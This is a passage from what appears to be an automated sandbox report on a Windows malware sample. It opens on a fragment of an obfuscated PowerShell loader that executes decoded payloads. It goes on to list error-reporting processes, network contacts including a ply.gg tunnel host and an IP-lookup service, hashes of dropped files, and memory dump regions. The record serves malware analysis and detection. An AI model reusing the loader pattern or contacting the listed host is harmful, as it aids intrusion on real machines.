'')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1780 -ip 1780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 2772
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | ii-restored.gl.at.ply.gg | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 104.26.12.31:443 | api.ip.sb | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
| MD5 | 23bad6dd1951a20924f5046c913d8ff2 |
| SHA1 | 812500904e0800703382b460c20e0ed3b1ff0b4d |
| SHA256 | 03bbd3b3e518b52769bb9cf6e158cc771869b86b3a5ae74072aa82ac2be739bd |
| SHA512 | 5368bbe4046a080dcdc53774a4197f92adf65c640135bbc3a0cae9111d6d8a6779648b4b68ccd1251c4819c1cd043a7ef88efd4d0bf70ed02eab1dc2ca656e91 |
memory/1780-3-0x0000000074FDE000-0x0000000074FDF000-memory.dmp
memory/1780-4-0x0000000004F50000-0x0000000004F86000-memory.dmp
memory/1780-5-0x00000000056E0000-0x0000000005D0A000-memory.dmp
memory/1780-6-0x0000000074FD0000-0x0000000075781000-memory.dmp
memory/1780-7-0x0000000074FD0000-0x0000000075781000-memory.dmp
memory/1780-8-0x0000000005570000-0x0000000005592000-memory.dmp
memory/1780-9-0x0000000005D80000-0x0000000005DE6000-memory.dmp
memory/1780-10-0x0000000005DF0000-0x0000000005E56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cenr0r1r.yvn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1780-19-0x0000000005E60000-0x00000000061B7000-memory.dmp
memory/1780-20-0x0000000006300000-0x000000000631E000-memory.dmp
memory/1780-21-0x0000000006340000-0x000000000638C000-memory.dmp
memory/1780-22-0x0000000007B50000-0x00000000081CA000-memory.dmp
memory/1780-23-0x0000000006900000-0x000000000691A000-memory.dmp
memory/1780-24-0x00000000074F0000-0x00000000074F8000-memory.dmp
memory/1780-25-0x0000000007500000-0x0000000007512000-memory.dmp
memory/1780-26-0x0000000007510000-0x000000000752E000-memory.dmp
memory/1780-27-0x00000000087F0000-0x0000000008E08000-memory.dmp
memory/1780-28-0x00000000075F0000-0x0000000007602000-memory.dmp
memory/1780-29-0x0000000007650000-0x000000000768C000-memory.dmp
memory/1780-30-0x00000000077D0000-0x00000000078DA000-memory.dmp
memory/1780-31-0x00000000083A0000-0x0000000008562000-memory.dmp
memory/1780-32-0x0000000009340000-0x000000000986C000-memory.dmp
memory/1780-33-0x0000000074FD0000-0x0000000075781000-memory.dmp